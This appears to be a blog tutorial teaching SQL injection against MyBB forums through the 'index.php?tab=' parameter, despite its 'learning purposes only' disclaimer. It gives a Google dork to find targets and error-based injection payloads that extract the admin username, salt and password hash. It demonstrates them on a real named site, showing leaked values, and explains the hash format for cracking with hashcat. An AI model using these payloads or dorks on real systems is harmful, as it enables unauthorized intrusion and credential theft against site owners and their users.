This thread was made for learning purposes only, any black hat activities that involves this method is on your own risk, I'm not responsible for your actions.
First of all we've got to find a vulnerable.
Google this:
inurl:"index.php?tab=" intext:"MyBB"Find a site that's vulnerable.
How to test if the site is vulnerable:
http://Target.com/index.php?tab=8'If the site is vulnerable, you should get a mySQL error like this one:
![[Image: 3314ed3d197c1594c9f1aeae321594b4.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vpdyqHp45ab1Xxj_eOhpJWXsbZwHbZZFUn0fLzNmXzsWN9n4CHSiexXU7EstJFbwGpceDh2J77ck5r5LvjGax-2u0cgB69Wn11brpAP17WYfbjIrzMrC38=s0-d)
Now you have a vulnerable MyBB forum, now it's time to hack it, paste the following code into the browser:
and(select 1 from(select
count(*),concat((select username from mybb_users where
uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)--
-I found this vulnerable site:
http://download4all.in/index.php?tab=3'So this is how it should be in your browser:
http://download4all.in/index.php?tab=3'
and(select 1 from(select count(*),concat((select username from
mybb_users where uid=1),floor(Rand(0)*2))a from
information_schema.tables group by a)b)-- -Now you'll see the username, like this:
![[Image: a3910f4e0ae8f1fd23d39ab6df90e8eb.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uZ_IZ-KsmGoyOw4Xa7rv_MkSsHpdsjZuSGOb47fKqlnpgAoXAsfJjwlYHedYSrSKE_pM1ZlbAtcENZBqgyXARfqRErhbta_JR7wMG9jvIPUdl1Sp82k4s=s0-d)
Username can be found here
![[Image: b918d42bcee3ea02416261f6766568a9.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tGKQjD76LbteS3WatoDmp2GgLhQTEvykH35Le7PlfYVL-1GGKtNAD6aLvMKFWdqKULcFX6gjX9pxpyCXnN7OIWQitb_QcVg85QypCCUzA9pOg_MbVaZEA=s0-d)
So the admin username is:
Admin1Now we have to get the Salt, so paste the following thing into your browser:
http://download4all.in/index.php?tab=3'
and(select 1 from(select count(*),concat((select salt from mybb_users
where uid=1),floor(Rand(0)*2))a from information_schema.tables group by
a)b)-- -Now you'll see this:
![[Image: 18fcfd4f7774b9e979c352f83a4c2cda.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ujtG5a9t7im_eVMBRPSYvTJM21XFpqbjVWJsIRimxZ0FossSVUAIJZLbBE6XACvjgpDrHC87IuzPeomBz9DG6eowXZCP_JYQpMix9cES5rFfHNfAJ65ZCC=s0-d)
So the salt is:
:
7JFqQhFk1Now we have to get the admin password:
http://download4all.in/index.php?tab=3'
and(select 1 from(select count(*),concat((select password from
mybb_users where uid=1),floor(Rand(0)*2))a from
information_schema.tables group by a)b)-- -Now you'll see this:
![[Image: 25f9f44c6d28f01f71373296c6c3cc12.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_seCCRrdKgiatYqmv8VzuNFf8tg9oyy1x6g_ql-koTT2X6Tg1PQ0s7uM7SgoLMaeag7UOZKZyzJwBknQfiJcKYhvYAC-4Ndt1rJ6i8S6eaGop0Sr07NEwA4=s0-d)
The password is encrypted, you can use hashcat to decrypt it.
Mybb password hashing method is md5(md5($salt).md5($pass)).
How to search for vulnerabilities in a certain MyBB forum.
site:http://target.com inurl:"index.php?tab="So for example:
site:http://download4all.in inurl:"index.php?tab="Hope You Like My Tutorial
0 comments:
Post a Comment